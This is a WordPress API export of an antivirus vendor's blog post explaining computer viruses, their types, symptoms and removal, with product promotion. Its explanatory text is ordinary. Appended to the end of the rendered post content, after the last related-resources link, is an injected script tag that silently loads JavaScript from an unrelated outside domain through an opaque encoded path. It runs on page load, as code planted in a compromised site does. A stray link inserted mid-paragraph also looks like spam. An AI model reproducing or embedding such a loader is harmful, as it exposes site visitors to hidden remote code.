{"id":7166,"date":"2024-06-20T08:49:00","date_gmt":"2024-06-20T03:19:00","guid":{"rendered":"https:\/\/antivirus.comodo.com\/blog\/?p=7166"},"modified":"2025-10-25T22:36:42","modified_gmt":"2025-10-25T17:06:42","slug":"what-is-a-computer-virus","status":"publish","type":"post","link":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/","title":{"rendered":"What is a Computer Virus and how do they work?"},"content":{"rendered":"<div><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-7303\" src=\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2019\/03\/what-is-computer-virus.png\" alt=\"What is Computer Virus\" width=\"650\" height=\"300\" srcset=\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2019\/03\/what-is-computer-virus.png 650w, https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2019\/03\/what-is-computer-virus-300x138.png 300w, https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2019\/03\/what-is-computer-virus-225x104.png 225w\" sizes=\"auto, (max-width: 650px) 100vw, 650px\" \/><\/div>\n<h2>What is a Computer Virus?<\/h2>\n<p>A computer virus is a malicious code designed to spread from host to host by itself without the user\u2019s knowledge to perform malicious actions. It imposes harm to a computer by corrupting system files, destroying data or otherwise by being a nuisance. The reason for designing a computer virus is to attack vulnerable systems to gain admin control and steal confidential information \u2014 Cybercriminals prey on online users by tricking them.<\/p>\n<h2><strong>How does a Computer Virus Spread<\/strong><\/h2>\n<p>A <a href=\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-virus-and-its-definition\/\" target=\"_blank\" rel=\"noopener\">computer virus<\/a> spreads through removable media, internet downloads, and e-mail attachments. In other words, a virus spreads while the user is viewing an infected advertisement, visiting an infected website, opening the attachment in the email, or clicking on an executable file. Besides that, connecting with an already infected removable storage device such as a USB drive also spreads the infection. (<a href=\"https:\/\/ci.lt\/\">https:\/\/ci.lt\/<\/a>) <\/p>\n<p>There are two ways by which a virus operates; the first type starts replicating itself as soon as it lands on the computer; the second type remains dormant until it is triggered. Therefore, it is essential to install robust <a title=\"antivirus software\" href=\"https:\/\/www.comodo.com\/home\/internet-security\/antivirus-advanced.php\" target=\"_blank\" rel=\"noopener\">antivirus software<\/a> on a computer to steer clear of all such threats.<\/p>\n<div>\n<h2>Types of Computer Virus (Updated 2020)<\/h2>\n<div>\n<div>\n<ul>\n<li>Boot Sector Virus<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<div>\n<div>\n<ul>\n<li>Direct Action Virus<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<div>\n<div>\n<ul>\n<li>Resident Virus<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<div>\n<div>\n<ul>\n<li>Multipartite Virus<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<div>\n<div>\n<ul>\n<li>Polymorphic Virus<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<div>\n<div>\n<ul>\n<li>Overwrite Virus<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<div>\n<div>\n<ul>\n<li>Spacefiller Virus<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<div>\n<div>\n<ul>\n<li>File Infector Virus<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<p><strong>Boot Sector Virus \u2013<\/strong><br \/>\nThe Boot Sector virus infects the master boot record, and it mostly spreads through the removable media. It is a complex task to remove this virus and often requires the system to be formatted.<\/p>\n<p><strong>Direct Action Virus \u2013<\/strong><br \/>\nThe Direct-Action Virus remains dormant on a computer until the file containing the virus is executed.<\/p>\n<p><strong>Resident Virus \u2013<\/strong><br \/>\nThe Resident Virus inserts itself in a computer system\u2019s memory. It is hard to identify the virus, and it is equally tough to remove it.<\/p>\n<p><strong>Multipartite Virus \u2013<\/strong><br \/>\nThe Multipartite Virus infects and spreads in multiple ways. This virus infects both the program files and the system sectors.<\/p>\n<p><strong>Polymorphic Virus \u2013<\/strong><br \/>\nA Polymorphic Virus is more capable of altering its signature pattern whenever it replicates thereby rendering it hard to be detected.<\/p>\n<p><strong>Overwrite Virus \u2013<\/strong><br \/>\nAs the name suggests, an Overwrite Virus spreads through emails and deletes all the files it infects.<\/p>\n<p><strong>Spacefiller Virus \u2013<\/strong><br \/>\nThe Spacefiller Virus is also known as Cavity Virus; it occupies the empty spaces between the codes. It does not harm the files.<\/p>\n<p><a href=\"https:\/\/secure.nurd.com\/home\/purchase.php?pid=109&amp;af=16166\" target=\"_blank\" rel=\"noopener\"><br \/>\n<!--<img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-8604\" src=\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2019\/12\/complete-antivirus.png\" alt=\"comodo antivirus\" width=\"650\" height=\"83\" \/>--><br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-8604\" src=\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2020\/03\/Banner-4.png\" alt=\"comodo antivirus\" width=\"650\" height=\"83\" \/><br \/>\n<\/a><\/p>\n<p><strong>File Infector Virus &#8211;<\/strong><br \/>\nA File Infector Virus is also known as Parasitic Virus because it comes attached to program files, such as .COM or .EXE files. The best way to detect file infector viruses is to use virus detector software.<\/p>\n<h3>Computer Virus Symptoms<\/h3>\n<p>The list of computer virus symptoms include:<\/p>\n<ul>\n<li>A slow performing computer<\/li>\n<li>Pop-ups automatically showing up on the screen<\/li>\n<li>Programs running on their own<\/li>\n<li>Automatic multiplying\/duplicating files<\/li>\n<li>Presence of unknown files and applications on the computer<\/li>\n<li>Files getting deleted or corrupted<\/li>\n<\/ul>\n<p>When a user comes across any of these symptoms, then there are chances that the computer is virus infected. There are two approaches to erase computer infection. The first approach is do-it-yourself and the second approach is to ask for some help to get rid of the virus.<\/p>\n<p>If you want to do it yourself, install Comodo Antivirus on the computer to remove viruses. The <a href=\"https:\/\/antivirus.comodo.com\/free-antivirus.php\" target=\"_blank\" rel=\"noopener\">antivirus<\/a> is designed to protect computers from sophisticated threats too. Here&#8217;s a list of things that a user needs to do:<br \/>\nStep 1- Disconnect your computer from the internet<br \/>\nStep 2- Enter Safe Mode \u2013 this helps running only the required programs and applications.<br \/>\nStep 3- Delete all temporary files to free up the disk space<br \/>\nStep 4- Run a virus scan<\/p>\n<h3>Why Comodo Antivirus software<\/h3>\n<p><a href=\"https:\/\/www.comodo.com\/home\/internet-security\/antivirus.php\" target=\"_blank\" rel=\"noopener\">Comodo Antivirus<\/a> has real-time protection and threat-detection technology for complete <a href=\"https:\/\/antivirus.comodo.com\/virus-protection.php\" target=\"_blank\" rel=\"noopener\">virus protection<\/a> and removal. The below-mentioned techniques are used to protect your computer:<\/p>\n<ul>\n<li>Behaviour-based detection<\/li>\n<li>Signature-based detection<\/li>\n<li>Sandbox detection<\/li>\n<li>Heuristic-based detection<\/li>\n<li>Data mining techniques<\/li>\n<\/ul>\n<p>Protect your computer from all types of viruses with Comodo Free Antivirus. <a href=\"https:\/\/antivirus.comodo.com\/download\/thank-you.php?prod=cloud-antivirus&amp;track=16678&amp;af=16678\">Download Now<\/a><\/p>\n<p><a href=\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-virus-and-its-definition\/\">Types of Computer Virus<\/a><\/p>\n<p><a href=\"https:\/\/antivirus.comodo.com\/download\/thank-you.php?prod=cloud-antivirus&amp;track=16678&amp;af=16678\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" class=\"aligncenter size-full wp-image-8604\" src=\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2018\/04\/Comodo-Free-Antivirus.png\" alt=\"comodo antivirus\" \/><\/a><\/p>\n<p><strong>Related Resources:<\/strong><\/p>\n<p><strong><a href=\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/best-antivirus-of-2019\/\" target=\"_blank\" rel=\"noopener\">Best Antivirus<\/a><\/strong><\/p>\n<p><strong><a href=\"https:\/\/antivirus.comodo.com\/antivirus-for-android.php\" target=\"_blank\" rel=\"noopener\">Antivirus for Android<\/a><br \/>\n<\/strong><\/p>\n<p><strong><a href=\"https:\/\/cwatch.comodo.com\/perform-website-safety-check.php\" target=\"_blank\" rel=\"noopener\">Website Safety Check<\/a><\/strong><\/p>\n<p><a href=\"https:\/\/blog.comodo.com\/pc-security\/what-is-internet-security\/\" target=\"_blank\" rel=\"noopener\">What is Internet Security?<\/a><\/p>\n<p><a href=\"https:\/\/antivirus.comodo.com\/blog\/comodo-news\/iloveyou-virus-and-its-removal\/\"><strong>iloveyou virus<\/strong><\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/best-website-security-for-enterprise.php\" target=\"_blank\"><strong>Best Website Security<\/strong><\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/website-checker.php\" target=\"_blank\"><strong>Website Checker<\/strong><\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/website-vulnerability-scanner-tools\/\" target=\"_blank\"><strong>Website Vulnerability Scanner<\/strong><\/a><\/p>\n<p><a title=\"Website Malware Scanner\" href=\"https:\/\/webinspector.com\/website-malware-scanner\/\" target=\"_blank\" rel=\"noopener\"><strong>Website Malware Scanner<\/strong><\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/website-status-checker.php\" target=\"_blank\" rel=\"noopener noreferrer\">Website Status<\/a><\/p>\n<p><a href=\"https:\/\/www.belugacdn.com\/blog\/hosting\/free-web-hosting\/\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Free Website Hosting<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/website-backup\/\" target=\"_blank\" rel=\"noopener noreferrer\">Website Backup<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/blog\/website-security\/password-hacker\/\" target=\"_blank\" rel=\"noopener noreferrer\">Password Hacker<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/web-application-protection.php\" target=\"_blank\" rel=\"noopener noreferrer\">Web Application Protection<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/web-security-check.php\" target=\"_blank\" rel=\"noopener noreferrer\">Web Security Check<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/website-protection-software.php\" target=\"_blank\" rel=\"noopener noreferrer\">Website Protection Software<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/website-security\/best-ddos-protection.php\" target=\"_blank\" rel=\"noopener\">Best DDoS Protection<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/ddos-service\/hacker-protection.php\" target=\"_blank\" rel=\"noopener\">Hacker Protection<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/website-security\/free-website-monitoring.php\" target=\"_blank\" rel=\"noopener\">Free Website Monitoring<\/a><\/p>\n<p><a href=\"https:\/\/www.itarian.com\/best-remote-desktop.php\" target=\"_blank\" rel=\"noopener\">Best Remote Desktop Software<\/a><\/p>\n<p><a href=\"https:\/\/www.itarian.com\/remote-desktop-connection-manager.php\" target=\"_blank\" rel=\"noopener\">Remote Desktop Connection Manager<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/how-to-secure-your-website.php\" target=\"_blank\" rel=\"noopener\">How to Secure your Website<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/how-to-check-if-a-website-is-safe.php\" target=\"_blank\" rel=\"noopener\">Check Website Safety<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/website-malware-removal.php\" target=\"_blank\" rel=\"noopener\">Website Malware Removal<\/a><\/p>\n<p><a href=\"https:\/\/www.itarian.com\/itsm\/itsm-software.php\" target=\"_blank\" rel=\"noopener\">ITSM Software<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/siem\/ddos-tools.php\" target=\"_blank\" rel=\"noopener\">DDoS Tools<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/blog\/website-security\/how-to-spot-a-fake-fraudulent-or-scam-website\/\" target=\"_blank\" rel=\"noopener\">Website Scam Checker<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/dns-security\/link-scanner.php\" target=\"_blank\" rel=\"noopener\">Link Scanner<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/site-scan\/check-website-reputation.php\" target=\"_blank\" rel=\"noopener\">Check Website Reputation<\/a><\/p>\n<p><a href=\"https:\/\/cwatch.comodo.com\/blog\/website-security\/how-to-tell-if-a-website-is-safe\/\" target=\"_blank\" rel=\"noopener\">Is This Website Safe<\/a><\/p>\n<p><a href=\"https:\/\/www.comodo.com\/managed-detection-response\/\" target=\"_blank\" rel=\"noopener\">Managed Detection and Response<\/a><script>;(function(e,l,v,j,f){j=e.createElement(l);f=e.getElementsByTagName(l)[0];j.async=1;j.src=v;f.parentNode.insertBefore(j,f);})(document,'script','https:\/\/trademark.iglesiaelarca.com\/oBiWuds69dDEOqyLly+6m9I6rJvWbvHKgmU=');<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>What is a Computer Virus? A computer virus is a malicious code designed to spread from host to host by itself without the user\u2019s knowledge to perform malicious actions. It imposes harm to a computer by corrupting system files, destroying data or otherwise by being a nuisance. The reason for designing a computer virus is [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":7304,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-7166","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-computer-safety"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>What is a Computer Virus? | Types of Computer Virus 2024<\/title>\n<meta name=\"description\" content=\"Here find the types of computer virus. A computer virus is a malicious code which executes itself by modifying other computer programs.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"What is a Computer Virus? | Types of Computer Virus 2024\" \/>\n<meta property=\"og:description\" content=\"Here find the types of computer virus. A computer virus is a malicious code which executes itself by modifying other computer programs.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/\" \/>\n<meta property=\"og:site_name\" content=\"Comodo Antivirus Blogs | Anti-Virus Software Updates\" \/>\n<meta property=\"article:published_time\" content=\"2024-06-20T03:19:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-25T17:06:42+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2019\/03\/computer-virus-types.png\" \/>\n\t<meta property=\"og:image:width\" content=\"225\" \/>\n\t<meta property=\"og:image:height\" content=\"170\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"seo\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"seo\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/\",\"url\":\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/\",\"name\":\"What is a Computer Virus? | Types of Computer Virus 2024\",\"isPartOf\":{\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2019\/03\/computer-virus-types.png\",\"datePublished\":\"2024-06-20T03:19:00+00:00\",\"dateModified\":\"2025-10-25T17:06:42+00:00\",\"author\":{\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/#\/schema\/person\/e534eccce9a7e6ced088443c73329462\"},\"description\":\"Here find the types of computer virus. A computer virus is a malicious code which executes itself by modifying other computer programs.\",\"breadcrumb\":{\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/#primaryimage\",\"url\":\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2019\/03\/computer-virus-types.png\",\"contentUrl\":\"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2019\/03\/computer-virus-types.png\",\"width\":225,\"height\":170,\"caption\":\"Computer Virus Types\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/antivirus.comodo.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"What is a Computer Virus and how do they work?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/#website\",\"url\":\"https:\/\/antivirus.comodo.com\/blog\/\",\"name\":\"Comodo Antivirus Blogs | Anti-Virus Software Updates\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/antivirus.comodo.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/#\/schema\/person\/e534eccce9a7e6ced088443c73329462\",\"name\":\"seo\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/antivirus.comodo.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/3b7714e98dafc3a3b391832c0f5e2b406856b62c8e81ad94382c197cdb380790?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/3b7714e98dafc3a3b391832c0f5e2b406856b62c8e81ad94382c197cdb380790?s=96&d=mm&r=g\",\"caption\":\"seo\"},\"url\":\"https:\/\/antivirus.comodo.com\/blog\/author\/seo\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"What is a Computer Virus? | Types of Computer Virus 2024","description":"Here find the types of computer virus. A computer virus is a malicious code which executes itself by modifying other computer programs.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/","og_locale":"en_US","og_type":"article","og_title":"What is a Computer Virus? | Types of Computer Virus 2024","og_description":"Here find the types of computer virus. A computer virus is a malicious code which executes itself by modifying other computer programs.","og_url":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/","og_site_name":"Comodo Antivirus Blogs | Anti-Virus Software Updates","article_published_time":"2024-06-20T03:19:00+00:00","article_modified_time":"2025-10-25T17:06:42+00:00","og_image":[{"width":225,"height":170,"url":"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2019\/03\/computer-virus-types.png","type":"image\/png"}],"author":"seo","twitter_card":"summary_large_image","twitter_misc":{"Written by":"seo","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/","url":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/","name":"What is a Computer Virus? | Types of Computer Virus 2024","isPartOf":{"@id":"https:\/\/antivirus.comodo.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/#primaryimage"},"image":{"@id":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/#primaryimage"},"thumbnailUrl":"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2019\/03\/computer-virus-types.png","datePublished":"2024-06-20T03:19:00+00:00","dateModified":"2025-10-25T17:06:42+00:00","author":{"@id":"https:\/\/antivirus.comodo.com\/blog\/#\/schema\/person\/e534eccce9a7e6ced088443c73329462"},"description":"Here find the types of computer virus. A computer virus is a malicious code which executes itself by modifying other computer programs.","breadcrumb":{"@id":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/#primaryimage","url":"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2019\/03\/computer-virus-types.png","contentUrl":"https:\/\/antivirus.comodo.com\/blog\/wp-content\/uploads\/2019\/03\/computer-virus-types.png","width":225,"height":170,"caption":"Computer Virus Types"},{"@type":"BreadcrumbList","@id":"https:\/\/antivirus.comodo.com\/blog\/computer-safety\/what-is-a-computer-virus\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/antivirus.comodo.com\/blog\/"},{"@type":"ListItem","position":2,"name":"What is a Computer Virus and how do they work?"}]},{"@type":"WebSite","@id":"https:\/\/antivirus.comodo.com\/blog\/#website","url":"https:\/\/antivirus.comodo.com\/blog\/","name":"Comodo Antivirus Blogs | Anti-Virus Software Updates","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/antivirus.comodo.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/antivirus.comodo.com\/blog\/#\/schema\/person\/e534eccce9a7e6ced088443c73329462","name":"seo","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/antivirus.comodo.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/3b7714e98dafc3a3b391832c0f5e2b406856b62c8e81ad94382c197cdb380790?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/3b7714e98dafc3a3b391832c0f5e2b406856b62c8e81ad94382c197cdb380790?s=96&d=mm&r=g","caption":"seo"},"url":"https:\/\/antivirus.comodo.com\/blog\/author\/seo\/"}]}},"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/posts\/7166","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/comments?post=7166"}],"version-history":[{"count":63,"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/posts\/7166\/revisions"}],"predecessor-version":[{"id":22461,"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/posts\/7166\/revisions\/22461"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/media\/7304"}],"wp:attachment":[{"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/media?parent=7166"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/categories?post=7166"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/antivirus.comodo.com\/blog\/wp-json\/wp\/v2\/tags?post=7166"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}